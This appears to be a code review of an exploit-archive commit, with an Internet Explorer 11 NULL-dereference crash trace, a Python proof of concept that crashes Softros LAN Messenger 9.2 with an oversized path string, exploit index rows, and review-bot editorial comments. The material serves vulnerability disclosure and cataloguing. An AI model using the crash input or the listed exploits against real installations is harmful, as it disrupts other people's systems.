1:022:x86> r
eax=00000000 ebx=204d6b40 ecx=10ba9500 edx=00000001 esi=204d6b40 edi=10ba9500
eip=555ae81a esp=0535d3f8 ebp=0535d454 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
MSHTML!Tree::Notify_InvalidateDisplay+0x1f:
555ae81a 81b81804000080380100 cmp dword ptr [eax+418h],13880h ds:002b:00000418=????????
1:022:x86> kb
# ChildEBP RetAddr Args to Child
00 0535d400 55d882b4 00000000 19540000 148ca2d0 MSHTML!Tree::Notify_InvalidateDisplay+0x1f
01 0535d454 55d547e9 148ca2a0 0535d4c8 204c7770 MSHTML!Tree::Notify_TextRangeHighlighted+0x140
02 0535d4ac 55d55337 204c7770 204c7720 00000000 MSHTML!CSelectionRenderingServiceProvider::InvalidateSegment+0x148
03 0535d4ec 5582e569 148ca270 00000001 19070980 MSHTML!CSelectionRenderingServiceProvider::PrivateClearSegment+0x106
04 0535d504 556a24db 049c8000 148ca270 00000200 MSHTML!CDoc::RemoveSegment+0x39
05 0535d52c 5529fe11 0535d55c 5529fdd0 11ef40b0 MSHTML!CSelTrackServices::ClearSelection+0x401d83
06 0535d548 555e656d 00000000 00000001 00000001 MSHTML!CSelectTracker::BecomeDormant+0x41
07 0535d568 555f8288 00000000 00000001 00000001 MSHTML!CSelectionManager::HibernateTracker+0x2b
08 0535d590 55f054b1 00000000 00000001 0000000c MSHTML!CSelectionManager::EnsureDefaultTrackerPassive+0x51
09 0535d5c8 557f8eda 0535d630 555e9c37 00000000 MSHTML!CSelectionManager::DoPendingElementExit+0x429
0a 0535d5d0 555e9c37 00000000 5555c8fa 00000000 MSHTML!CSelectionManager::DoPendingTasks+0x20f28e
0b 0535d5d8 5555c8fa 00000000 1b034680 00000000 MSHTML!CSelectionManager::EnsureEditContext+0x20
0c 0535d630 5555c80e 0000000c 00000000 00000000 MSHTML!CSelectionManager::Notify+0x7c
0d 0535d654 5555c7a5 1b034680 0000000c 00000000 MSHTML!CHTMLEditor::Notify+0x51
0e 0535d670 5555c5fd 1b034680 0000000c 00000000 MSHTML!CHTMLEditorProxy::Notify+0x35
0f 0535d698 555e7edb 0000000c 00000000 00000000 MSHTML!CDoc::NotifySelection+0x4f
10 0535d92c 555e5c91 00000000 555e5c50 555e5c50 MSHTML!CCaret::UpdateScreenCaret+0xbe
11 0535d940 555baffb 10b7d8f0 049c8000 0000011f MSHTML!CCaret::DeferredUpdateCaret+0x41
12 0535d9bc 555bb394 d836afd1 00008002 00000000 MSHTML!GlobalWndOnMethodCall+0x21b
13 0535da08 75a9be6b 00190984 00008002 00000000 MSHTML!GlobalWndProc+0xe4
14 0535da34 75a9833a 555bb2b0 00190984 00008002 USER32!_InternalCallWinProc+0x2b
15 0535db1c 75a97bee 555bb2b0 00000000 00008002 USER32!UserCallWinProcCheckWow+0x3aa
16 0535db98 75a979d0 b9836150 0535fd34 5643485f USER32!DispatchMessageWorker+0x20e
17 0535dba4 5643485f 0535dbe0 00e4b470 008ff230 USER32!DispatchMessageW+0x10
18 0535fd34 56433e60 0535fe00 56433a50 00e433e8 IEFRAME!CTabWindow::_TabWindowThreadProc+0x46f
19 0535fdf4 5bdcb61c 00e4b470 0535fe18 56488ce0 IEFRAME!LCIETab_ThreadProc+0x410
1a 0535fe0c 5bd6e6cd 00e433e8 5bd6e640 5bd6e640 msIso!_IsoThreadProc_WrapperToReleaseScope+0x1c
1b 0535fe44 77648484 0089c570 77648460 f7de4b1c IEShims!NS_CreateThread::AutomationIE_ThreadProc+0x8d
1c 0535fe58 77a7305a 0089c570 005c205f 00000000 KERNEL32!BaseThreadInitThunk+0x24
1d 0535fea0 77a7302a ffffffff 77a8ec8b 00000000 ntdll_77a10000!__RtlUserThreadStart+0x2f
1e 0535feb0 00000000 5bd6e640 0089c570 00000000 ntdll_77a10000!_RtlUserThreadStart+0x1b
1:022:x86> .exr -1
ExceptionAddress: 555ae81a (MSHTML!Tree::Notify_InvalidateDisplay+0x0000001f)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000000
Parameter[1]: 00000418
Attempt to read from address 00000418
1:022:x86> ub
MSHTML!Tree::Notify_InvalidateDisplay+0x7:
555ae802 f7460800001000 test dword ptr [esi+8],100000h
555ae809 756e jne MSHTML!Tree::Notify_InvalidateDisplay+0x7e (555ae879)
555ae80b 8bc6 mov eax,esi
555ae80d 8b38 mov edi,dword ptr [eax]
555ae80f 85ff test edi,edi
555ae811 7462 je MSHTML!Tree::Notify_InvalidateDisplay+0x7a (555ae875)
555ae813 8bcf mov ecx,edi
555ae815 e8b664d5ff call MSHTML!CElement::GetMarkupPtr (55304cd0)
1:022:x86>
MSHTML!TSmartPointer<CFilterNativeInfo>::operator&+0x12:
555ae7f3 50 push eax
555ae7f4 e8a7f9c6ff call MSHTML!CFilterNativeInfo::Release (5521e1a0)
555ae7f9 ebf4 jmp MSHTML!TSmartPointer<CFilterNativeInfo>::operator&+0xe (555ae7ef)
MSHTML!Tree::Notify_InvalidateDisplay:
555ae7fb 8bff mov edi,edi
555ae7fd 53 push ebx
555ae7fe 56 push esi
555ae7ff 8bf1 mov esi,ecx
555ae801 57 push edi
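Review bot: The header at L1208 reads `# Exloit Title: Microsoft Internet Explorer 11 - Null Pointer Difference`, inconsistent with the `Null Pointer Dereference` wording used in the description at L1226–L1229 and in the index; fix to `# Exploit Title: Microsoft Internet Explorer 11 - Null Pointer Dereference`. The crash HTML is only referenced by URL at L1230, so the entry is not self-contained and cannot be reproduced if that link goes away; the fuzz case should be inlined. The three traces fault in three different functions (`CTreeNode::EnsureNoDependentLayoutFixup` at L1237, `CMarkup::BuildDescendentsList` at L1288, `Tree::Notify_InvalidateDisplay` at L1320) while the description attributes the crash to only the last one — it should say whether these are variants of a single root cause or separate NULL dereferences, and that every trace is a read from a NULL-based address (L1238, L1289, L1368), i.e. a crash with no indication of controllable memory corruption.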


@ -0,0 +1,23 @@
# Exploit Title: Softros LAN Messenger 9.2 - Denial of Service (PoC)
# Discovery by: Victor Mondragón
# Discovery Date: 2018-11-02
# Vendor Homepage: https://messenger.softros.com/
# Software Link: https://messenger.softros.com/downloads/
# Tested Version: 9.2
# Tested on: Windows 10 Single Language x64 / Windows 7 x64 Service Pack 1
# Steps to produce the crash:
# 1.- Run python code: Softros_LAN_Messenger_v9.2.py
# 2.- Open msn.txt and copy content to clipboard
# 2.- Open Softros LAN Messenger
# 3.- Select "Logging"
# 4.- Locate "Log Files Location "
# 5.- Select "Custom Location" and Paste ClipBoard
# 6.- Click on "OK"
# 7.- Crashed
cod = "\x41" * 2000
f = open('msn.txt', 'w')
f.write(cod)
f.close()
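Review bot: The reproduction steps at L1403 and L1404 both carry the number `2.`, so the list runs 1, 2, 2, 3…; renumber them 1–8. The entry gives no crash evidence — no exception code, faulting module or register state, unlike sibling entry 45778 in this commit — so a reader cannot tell whether pasting 2000 bytes into "Log Files Location" triggers a controllable overflow or merely an unhandled exception; a short debugger excerpt would make the DoS claim verifiable. The generator itself could use a context manager and avoid the explicit close: `with open('msn.txt', 'w') as f:` followed by `f.write("\x41" * 2000)`.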


@ -6175,6 +6175,7 @@ id,file,description,date,author,type,platform,port
45769,exploits/windows_x86-64/dos/45769.py,"WinMTR 0.91 - Denial of Service (PoC)",2018-11-02,"Ihsan Sencan",dos,windows_x86-64,
45770,exploits/windows_x86-64/dos/45770.py,"CdCatalog 2.3.1 - Denial of Service (PoC)",2018-11-02,"Ihsan Sencan",dos,windows_x86-64,
45772,exploits/windows_x86-64/dos/45772.py,"Zint Barcode Generator 2.6 - Denial of Service (PoC)",2018-11-02,"Ihsan Sencan",dos,windows_x86-64,
45781,exploits/windows_x86-64/dos/45781.py,"Softros LAN Messenger 9.2 - Denial of Service (PoC)",2018-11-05,"Victor Mondragón",dos,windows_x86-64,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -10077,6 +10078,9 @@ id,file,description,date,author,type,platform,port
45742,exploits/openbsd/local/45742.sh,"xorg-x11-server 1.20.3 - Privilege Escalation",2018-10-30,"Marco Ivaldi",local,openbsd,
45744,exploits/windows/local/45744.rb,"Any Sound Recorder 2.93 - Buffer Overflow Local (SEH) (Metasploit)",2018-10-30,d3ckx1,local,windows,
45765,exploits/windows/local/45765.txt,"Anviz AIM CrossChex Standard 4.3 - CSV Injection",2018-11-02,LiquidWorm,local,windows,
45778,exploits/windows/local/45778.txt,"Microsoft Internet Explorer 11 - Null Pointer Dereference",2018-11-05,LiquidWorm,local,windows,
45782,exploits/macos/local/45782.c,"LiquidVPN 1.36 / 1.37 - Privilege Escalation",2018-11-05,"Bernd Leitner",local,macos,
45785,exploits/hardware/local/45785.md,"Intel (Skylake / Kaby Lake) - 'PortSmash' CPU SMT Side-Channel",2018-11-02,"Billy Brumley",local,hardware,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -40281,3 +40285,12 @@ id,file,description,date,author,type,platform,port
45766,exploits/php/webapps/45766.txt,"Gate Pass Management System 2.1 - 'login' SQL Injection",2018-11-02,"Ihsan Sencan",webapps,php,80
45767,exploits/php/webapps/45767.txt,"qdPM 9.1 - 'filter_by' SQL Injection",2018-11-02,AkkuS,webapps,php,80
45768,exploits/php/webapps/45768.txt,"Yot CMS 3.3.1 - 'aid' SQL Injection",2018-11-02,"Ihsan Sencan",webapps,php,80
45773,exploits/php/webapps/45773.txt,"SiAdmin 1.1 - 'id' SQL Injection",2018-11-05,"Ihsan Sencan",webapps,php,80
45774,exploits/asp/webapps/45774.py,"Advantech WebAccess SCADA 8.3.2 - Remote Code Execution",2018-11-05,"Chris Lyne",webapps,asp,
45775,exploits/php/webapps/45775.txt,"WebVet 0.1a - 'id' SQL Injection",2018-11-05,"Ihsan Sencan",webapps,php,80
45776,exploits/hardware/webapps/45776.py,"Virgin Media Hub 3.0 Router - Denial of Service (PoC)",2018-11-05,"Ross Inman",webapps,hardware,
45777,exploits/php/webapps/45777.txt,"Poppy Web Interface Generator 0.8 - Arbitrary File Upload",2018-11-05,"Ihsan Sencan",webapps,php,
45779,exploits/php/webapps/45779.txt,"Mongo Web Admin 6.0 - Information Disclosure",2018-11-05,"Ihsan Sencan",webapps,php,
45780,exploits/php/webapps/45780.py,"PHP Proxy 3.0.3 - Local File Inclusion",2018-11-05,AkkuS,webapps,php,
45783,exploits/json/webapps/45783.html,"Royal TS/X - Information Disclosure",2018-11-05,"Jakub Palaczynski",webapps,json,54890
45784,exploits/php/webapps/45784.txt,"Voovi Social Networking Script 1.0 - 'user' SQL Injection",2018-11-05,"Ihsan Sencan",webapps,php,
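Review bot: The IE 11 entry at L1429 is indexed with type `local` under `exploits/windows/local/`, yet the file it points to is a crash-only NULL pointer dereference with no code execution or privilege escalation shown, which the sibling crash PoC at L1421 classifies as `dos`; `…,"Microsoft Internet Explorer 11 - Null Pointer Dereference",2018-11-05,LiquidWorm,dos,windows,` (with the file under `exploits/windows/dos/`) would be consistent. The port column is also inconsistent across the new webapp rows: L1439, L1441 carry `80` while L1440, L1443–L1445 and L1447, all HTTP exploits, leave it empty.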
